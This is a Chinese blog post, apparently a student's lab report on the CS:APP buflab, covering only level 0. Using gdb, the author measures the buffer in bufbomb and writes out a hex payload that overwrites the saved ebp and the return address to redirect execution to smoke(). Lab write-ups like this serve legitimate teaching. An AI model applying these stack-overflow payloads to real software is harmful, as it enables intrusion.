buflab实验报告:32位程序缓冲区溢出攻击

最新推荐文章于 2024-05-26 01:05:10 发布
最新推荐文章于 2024-05-26 01:05:10 发布
阅读量701 收藏 5
点赞数 1
分类专栏: csapp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/adsfnkldaws/article/details/116279683
版权

buflab实验报告:32位程序缓冲区溢出攻击

在此实验开始之前,弄清楚给你的三个文件分别干嘛的。

bufbomb:实验需要攻击的程序

hex2raw:根据填写的字节生成攻击字符串

makecookie:对每个实验用户生成一个八位十六进制的字节序列,用于识别用户。(可能是用来打分的)

gdb要运行的时候,一定要输入r -u <your id>,终端运行要输入./bufbomb -u <your id>,否则你是运行不了的。那咱们先输入./makecookie -q生成你的cookie(id),最好先找个地儿保存一下。

作者在这里赞美一下这本书的编者:csapp的所有实验设计简直不要太好,学习计算机系统本是一个很枯燥的学习过程,但是这里的实验最大程度激发学生学习的兴趣。同时也希望国内的编者能够借鉴这本书的巧妙之处,让国内出越来越多的优秀教材。(由于本人表达能力不够,也只能这么夸了qwq)

level0:Candle

这一堆英文我反正也看不来qwq,既然是level0不妨问题想简单一点:给了我test()函数,调用了一个getbuf(),而后又有一个gets()危险函数,又给了一个Smoke()函数,那么无疑,应该就是通过溢出调用Somke(),先反正不涉及代码注入等东西gdb就是万能的,我们普通地这么溢出只需要确定两点:

  1. 缓冲区的大小
  2. Smoke()函数的地址

gdb bufbomb然后:

print Smoke就可以输出函数的地址,disassemble getbuf就可以查看getbuf()的汇编代码

buflab_level0_1.png

可以看到,buf的大小是0x28,那么就构造payload

00 00 00 00 
00 00 00 00
00 00 00 00 
00 00 00 00
00 00 00 00 
00 00 00 00
00 00 00 00 
00 00 00 00
00 00 00 00 
00 00 00 00
18 8c 04 08

buflab_level0_2.png

但是发生了段错误,这里我调了很久,也可能是因为之前做64位的攻击,有点忘了32位的攻击的区别,因为真的之前就是它缓冲区开了多少我填那么多再堆返回地址就好了的。直到我看到getbuf()函数有一个leave指令,我这就去网上搜了一下leave指令。

Leave==
movl %ebp %esp
popl %ebp

啊这?又被弹出来了原来的ebp?可能在你们眼里这个完全是个没必要犯得错误,但是我遇到了我就得这么讲出来,也算是一种提升吧。那就很清楚了,我们把函数返回地址弹出去了,就导致给eip的不知道是什么地址了。所以再加四字节的00,就会把00 00 00 00弹给ebp而把smoke() 函数的返回地址弹给eip了。所以正确的payload应该是

00 00 00 00 
00 00 00 00
00 00 00 00 
00 00 00 00
00 00 00 00 
00 00 00 00
00 00 00 00 
00 00 00 00
00 00 00 00 
00 00 00 00
00 00 00 00
18 8c 04 08

最低0.47元/天 解锁文章
xi@0ji233
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
计算机系统基础之缓冲区溢出攻击实验
04-14
就是计算机系统基础的那个缓冲区溢出实验实验报告很详细。
CSAPP实验三:缓冲区溢出炸弹(Buflab
CNFINITE的博客
08-12 8786
本系列文章为中国科学技术大学计算机专业学科基础课《计算机系统》布置的实验,上课所用教材和内容为黑书CSAPP,当时花费很大精力和弯路,现来总结下各个实验,本文章为第三个实验——缓冲区溢出炸弹(Buflab)。 一、实验名称:buflab 二、实验学时: 3 三、实验内容和目的: 掌握函数调用时的栈帧结构,利用输入缓冲区的溢出漏洞,将攻击代码嵌入当前程序的栈帧中,使得程序执行我们所期望的过程 四、实验原理: 溢出的字符将覆盖栈帧上的数据 特...
2024Spring> HNU-计算机系统-实验4-Buflab-导引+验收
wolf的博客
05-26 937
HNU-计算机系统-实验4-Buflab 附助教的感悟,更新同学分享的重定位方法
计算机系统(2)】4 缓冲区溢出攻击
深大cs课程实验及学习笔记,ccfcsp部分真题,华为题库
06-19 1208
实验设计为一个黑客利用缓冲区溢出技术进行攻击的游戏。我们仅给黑客(同学)提供一个二进制可执行文件bufbomb和部分函数的C代码,不提供每个关卡的源代码。程序运行中有3个关卡,每个关卡需要用户输入正确的缓冲区内容,否则无法通过管卡! 要求同学查看各关卡的要求,运用GDB调试工具和objdump反汇编工具,通过分析汇编代码和相应的栈帧结构,通过缓冲区溢出办法在执行了getbuf()函数返回时作攻击,使之返回到各关卡要求的指定函数中。...
计算机系统实验五:缓冲区溢出攻击
Cheney ' blog
01-13 8656
内容: 实验内容: 1 缓冲区溢出攻击实验的内容、原理、方法和基本步骤; 2 过程调用的机器级表示、栈帧组成结构、缓冲区溢出等知识的回顾与应用。 实验目标: 1 加深对函数调用规则、栈结构、缓冲区溢出攻击原理、方法与防范等方面知识的理解和掌 握; 2 从程序员角度认识计算机系统,将程序设计、汇编语言、系统结构、操作系统、编译链接 中的重要概念贯穿起来,对指令在硬件上的执行过程和指令的底层硬件执行机制有深入的理 解;能够以需求分析为基础,对计算机系统模块或单元进行操作。 3 掌握各种开源的编译调试工具。 实验
计算机系统实验-BufLab
12-14 1564
计算机系统实验-BufLab
CSAPP LAB---buflab-handout(缓冲区溢出实验
热门推荐
The_V_的博客
07-11 2万+
LAB5 基础准备: 题目解析: 首先阅读那长达11页的英文文档,获悉本实验为模拟缓冲区溢出。 使用tar xvf命令解压文件后,会有3个可执行的二进制文件bufbomb,hex2raw,makecookie。 bufbomb运行时会进入getbuf函数,其中通过调用Gets函数读取字符串。要求在已知缓冲区大小的情况下对输入的字符串进行定制完成特定溢出操作。getbuf函数如下所示:
缓冲区溢出漏洞实验报告(附带程序源码和被攻击程序
04-18
3.缓冲区溢出演示 4.溢出攻击结果与危害 5.防御手段 适合人群: 具备一定编程基础,作业时间不够的学生,对缓冲区溢出原理不了解的初学者 环境: IDA pro7.6, vc++ ,x32dbg。 阅读建议: 有一点 x32dbg逆向工具...
《网络安全技术》大作业:缓冲区溢出实验报告
12-27
普通的程序员由于失误导致的缓冲区溢出可能只会导致程序无法运行而不会影响系统,但是如果黑客使用构造好的数据来进行缓冲区溢出攻击则可能获得超级管理员权限,非常危险。 二、实验流程 1. 系统环境 Windows操作...
缓冲区溢出漏洞实验报告
10-15
1.本次实验为了方便观察汇编语句,我们需要在 32 位环境下作操作,因此实验之前需要做一些准备。 输入命令安装一些用于编译 32 位 C 程序的软件包 Sudo apt-get update
汇编语言程序设计【缓冲区溢出攻击】(实验报告+源码)
最新发布
06-27
【作品名称】:汇编语言程序设计【缓冲区溢出攻击】(实验报告+源码) 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】...
缓冲区溢出攻击
06-13
计算机系统实验,内附代码(工具),以及实验报告,报告中含通关详细分析
论文研究-CBOC:一个C语言缓冲区溢出漏洞有效检测工具 .pdf
08-20
CBOC:一个C语言缓冲区溢出漏洞有效检测工具,陈石坤,李舟军,冲区溢出是C程序中很多安全问题的根源。本文给出一个C语言缓冲区溢出漏洞的有效检测工具CBOC(C Buffer Overflow Checker)。该工具基于符��
bufbomb实验心得及详细步骤
Yiyang的专栏
04-10 2万+
bufbomb是一个很有意思的,带有游戏性质的缓冲区溢出实验, 能够帮助你加深理解《Computer Systems A Programmer’s Perspective》书中第三章《Machine-Level Representation of Programs》中的内容。
CSAPP 深入理解计算机系统 Buflab实验缓冲区溢出攻击实验(1)
syq1207的博客
06-01 1万+
由于实验太长所以还是采用分开 其实感觉之前做过那个bomb实验以后,这个实验相对来说还是很容易的,主要是要搞懂缓冲区溢出原理,以及堆栈的过程,函数调用的实现过程,做完这个实验如果认认真真的做完,对于堆栈的过程,还有缓存溢出攻击的原理就会掌握的比较清楚的。个人感觉实验设计的还是非常的好的,非常值得做一做。做这个实验首先是要建立在bomb实验和对函数调用栈过程的基础上,如果你觉得你理解起来有困难
CSAPP buflab 实验报告
jzb的博客
05-10 1261
实验题目:BUFLAB 实验目的: 本实验将帮助您详细了解IA-32调用约定和堆栈组织。它涉及到对lab目录中的可执行文件bufbomb应用一系列缓冲区溢出攻击。注意:在本实验室中,您将获得使用操作系统和网络服务器中的安全漏洞的常用方法之一的第一手经验。我们的目的是帮助您了解程序的运行时操作,并理解这种形式的安全缺陷的性质,以便您在编写系统代码时可以避免它。 实验环境: ubuntu12.04 (32位)环境 实验内容: 根据实验压缩包中提供的可执行文件makecookie和自己设置的userid生成coo
buflab
哈哈哈哈哈哈哈哈的博客
05-24 1036
这个实验利用缓冲区的溢出来进行攻击,要求我们十分熟悉函数栈以及函数调用时栈帧的变化情况 综合利用反汇编后端代码和gdb调试来查看程序运行时的寄存器状态和内存里的数据,来必须能够熟练地预判栈指针的变化情况 在最后的几个LEVEL更是要求我们掌握编写汇编代码 要利用函数调用结束后的ret指令使得eip的值修改为函数的返回地址,以此让恶意代码获得执行权 要注意当我们在执行完恶意代码以后如果要把执行权力还给原本要返回的函数,要恢复寄存器的状态
<csapp> buffer lab (《深入理解计算机系统》lab3)
Stone
05-14 1万+
lab3 buflab。一个训练你利用buffer漏洞干一些非法的事情(狐狸脸ing)的
buf.writeUIntBE()函数详解
weixin_30470643的博客
11-05 578
buf.writeUIntBE(value, offset, byteLength[, noAssert]) buf.writeUIntLE(value, offset, byteLength[, noAssert]) value {Number} 需要被写入到 Buffer 的字节 offset {Number} 0 <= offset <= buf.length - byteLe...
【BUPT计算机系统基础】CSAPP-lab3-缓冲区溢出攻击.docx
11-29
"该文档是北京邮电大学(BUPT)计算机系统基础课程的实验报告,重点是缓冲区溢出攻击实验目标包括理解C程序的机器级表示、使用GDB调试器、了解x86-64架构的机器代码以及掌握两种缓冲区溢出攻击方法。实验在Linux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xi@0ji233

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值